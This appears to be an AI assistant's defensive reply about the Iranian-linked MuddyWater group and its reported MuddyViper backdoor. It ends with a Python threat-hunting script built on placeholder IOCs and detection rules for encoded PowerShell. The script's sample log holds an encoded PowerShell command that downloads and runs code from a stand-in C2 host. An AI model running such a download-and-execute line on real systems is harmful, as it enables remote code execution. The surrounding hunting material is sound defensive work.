This looks like a new development in the long-running MuddyWater activity, but I don’t have specific information about
MuddyViper itself because my knowledge only goes up to late 2024, and this campaign appears to be newer than that.
That said, some context may still be useful.
Who/what is MuddyWater?
MuddyWater (also known as Mango Sandstorm, TEMP.Zagros, TA450, etc.) is a well-known Iranian-linked threat actor that has historically:
- Targeted governments, telecoms, universities, and critical infrastructure
- Focused a lot on the Middle East, but also hit Europe, North America, and Asia
- Used a mix of custom tools and off-the-shelf remote access tools (RATs)
- Relied heavily on phishing (often with malicious documents or links)
They are usually associated with:
- Initial access via spear-phishing emails or compromised servers
- PowerShell-heavy tooling and “living off the land” (abusing built-in Windows tools)
- Backdoors with relatively simple but flexible command-and-control (C2) channels
- Follow-on activities like data exfiltration, credential theft, and lateral movement
What this MuddyViper backdoor likely implies
Without seeing the ESET write-up, I can’t describe MuddyViper’s exact capabilities, but given MuddyWater’s track record, a new backdoor typically means:
- Persistent remote access (C2 communication, command execution, file upload/download)
- Capability to deploy additional tools or ransomware/wipers at a later stage
- Focus on stealth and resiliency (multiple persistence methods, obfuscation, etc.)
It’s also notable (but not surprising) that:
- Targets are in critical and sensitive sectors: academia, engineering, utilities, technology, transportation
- There’s regional expansion: mainly Israel, but also at least one tech company in Egypt
If someone is worried they may be affected
For individuals or organizations concerned about this:
- Check the full ESET report you linked: they usually publish indicators of compromise (IOCs) (hashes, domains, IPs, file names, registry keys).
- Use those IOCs with:
  - Your EDR/AV solution (custom detection rules, if supported)
  - Network monitoring tools (block or monitor suspicious C2 infrastructure)
  - SIEM queries (to hunt for past activity)
- Harden email and RDP exposure (MuddyWater often uses phishing and weak external services).
- Ensure logging is enabled and centralized (PowerShell, WMI, process creation, and network connections).
For regular users on Windows
If you’re just a home user and not in one of the targeted sectors, risk is lower but good hygiene still matters:
- Keep Windows and software fully up to date.
- Use a reputable security suite with real-time protection.
- Be especially careful with unsolicited email attachments or document macros.
- If you suspect compromise, scan with:
  - Your main AV
  - An additional on-demand scanner (e.g. Microsoft Safety Scanner, ESET Online Scanner, Kaspersky Virus Removal Tool, etc.)
Next step
If you want, you can paste any IOCs, technical details, or screenshots from the ESET article here (sanitized), and I can help you interpret what they mean (e.g. what a specific registry key or command does). If this is about a real incident in your environment, it would be wise to also consult your security team / IR team. If you're a forum user just reading, keep an eye out for the full ESET research post and any YARA/Sigma rules they may publish.
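As an added example (not part of the reply above, and not code from ESET or any MuddyWater report), here is a small Python hunt of the kind the "use those IOCs with your EDR/SIEM" step describes: it loads an indicator list, walks Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) events exported as JSON lines, and flags hash, domain and IP matches alongside two behavioural checks that fit the PowerShell-heavy, phishing-delivered tradecraft mentioned earlier (an Office application spawning PowerShell, and a -EncodedCommand argument, which it decodes). Every indicator value and every log line is a constructed placeholder (the documentation IP 203.0.113.5, a .invalid domain, the hash of a dummy string); the field names are assumed to follow Sysmon's naming, and you would swap in the real IOCs from the report.

```python
import base64
import hashlib
import json
import re
from dataclasses import dataclass

# --- Indicator list ---------------------------------------------------------
# Constructed placeholders standing in for the hashes/domains/IPs a vendor
# report would publish. None of these are real MuddyViper indicators.
PLACEHOLDER_HASH = hashlib.sha256(b"constructed sample payload").hexdigest()
IOC_SHA256 = {PLACEHOLDER_HASH}
IOC_DOMAINS = {"c2.example.invalid"}
IOC_IPS = {"203.0.113.5"}  # TEST-NET-3, reserved for documentation

# --- Behavioural checks -----------------------------------------------------
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (longest alias first).
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell expects the argument to be base64 of UTF-16LE text; anything
    that does not decode that way is treated as "no encoded command"."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_jsonl(text: str):
    """Parse one JSON object per line (Sysmon-style events exported as JSONL)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def hunt(events):
    """Apply IOC matching and behavioural checks to Sysmon-style events.

    Assumed field layout (Sysmon naming): EventID 1 = process creation with
    Image, ParentImage, CommandLine, Hashes; EventID 3 = network connection
    with Image, DestinationIp, DestinationHostname."""
    findings = []
    for ev in events:
        host = ev.get("Computer", "?")
        image = ev.get("Image", "")
        if ev.get("EventID") == 1:
            # Hashes looks like "SHA256=...,MD5=..."; pick out SHA256.
            hashes = dict(p.split("=", 1) for p in ev.get("Hashes", "").split(",") if "=" in p)
            if hashes.get("SHA256", "").lower() in IOC_SHA256:
                findings.append(Finding("ioc_hash", host, image))
            parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
            if image.lower().endswith("powershell.exe") and parent in OFFICE_APPS:
                findings.append(Finding("office_spawns_powershell", host, f"{parent} -> {image}"))
            decoded = decode_encoded_command(ev.get("CommandLine", ""))
            if decoded is not None:
                findings.append(Finding("encoded_powershell", host, decoded))
        elif ev.get("EventID") == 3:
            dest = ev.get("DestinationHostname", "").lower() or ev.get("DestinationIp", "")
            if ev.get("DestinationIp") in IOC_IPS or dest in IOC_DOMAINS:
                findings.append(Finding("ioc_network", host, f"{image} -> {dest}"))
    return findings


def _enc(ps: str) -> str:
    """Encode text the way PowerShell -EncodedCommand expects (used to build the sample)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample log: two hosts, one with a phishing-style chain, one benign.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "Computer": "WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"),
     "Hashes": "SHA256=" + hashlib.sha256(b"powershell").hexdigest()},
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Users\Public\svchost.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\Public\svchost.exe", "Hashes": "SHA256=" + PLACEHOLDER_HASH},
    {"EventID": 3, "Computer": "WS01", "Image": r"C:\Users\Public\svchost.exe",
     "DestinationIp": "203.0.113.5", "DestinationHostname": "c2.example.invalid"},
    {"EventID": 1, "Computer": "WS02", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe",
     "Hashes": "SHA256=" + hashlib.sha256(b"notepad").hexdigest()},
    {"EventID": 3, "Computer": "WS02", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "198.51.100.7", "DestinationHostname": "cdn.example.net"},
])

if __name__ == "__main__":
    for f in hunt(parse_jsonl(SAMPLE_LOG)):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The IOC matches are exact and cheap to run over a SIEM export; the two behavioural rules are what catch the next campaign whose hashes and domains are not in the list yet, which is why it is worth keeping process-creation and PowerShell logging on even after the published indicators have been blocked.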